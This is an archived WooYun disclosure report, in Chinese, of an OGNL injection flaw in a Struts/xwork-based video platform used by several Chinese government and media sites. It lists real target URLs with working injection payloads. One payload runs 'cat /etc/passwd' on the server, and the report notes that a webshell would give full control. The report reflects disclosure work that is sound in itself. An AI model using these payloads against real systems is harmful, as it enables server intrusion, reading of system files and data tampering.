乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-07: 细节已通知厂商并且等待厂商处理中 2014-04-12: 厂商已经确认,细节仅向厂商公开 2014-04-15: 细节向第三方安全合作伙伴开放 2014-06-06: 细节向核心白帽子及相关领域专家公开 2014-06-16: 细节向普通白帽子公开 2014-06-26: 细节向实习白帽子公开 2014-07-06: 细节向公众公开
涉及多个重要政府部门
收影响的地址:首都之窗http://video.beijing.gov.cn/play.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}国资委信息中心http://vod.sasac.gov.cn/play.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}北京统计局http://vedio.bjstats.gov.cn/vodlist.jspa?redirect:$%7B%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29%7D中国华文教育网http://live.hwjyw.com/courseview.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}中国文明网http://search.wenming.cn/godpp/godSearch.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}中国海关杂志社http://www.ccmag.cn/cusmMaganized!docMaganized.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}中国残联http://search.cdpf.org.cn/mb/j/search/search.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}浙江电子口岸有限公司http://www.zjport.gov.cn/ask/questionDetailt.jspa中安网http://vchat.anhuinews.com:8080/chat/findPlay.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}
打印文本redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}查看passwd?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Getshell代码暂时保密。
本次测试没有进行任何操作,只测试了打印文本信息。
能够通过上次webshell可以完全控制服务器,删除篡改任意数据。本次没有进行进一步测试。
WAF过滤,升级系统。
危害等级:高
漏洞Rank:20
确认时间:2014-04-12 10:07
CNVD确认并在多个实例上复现所述情况(不过对于某后缀的搜索页面是否属于该软件还需要进一步认定),由CNVD通过公开联系渠道向生产厂商通报,北京尚为视讯科技有限公司技术部 ,010- -818,处置。 同时,已经将北京市及地方的案例向北京市信息化主管部门和对应分中心通报。对于10-11日出现的其他案例,后续仍将跟进处置。
暂无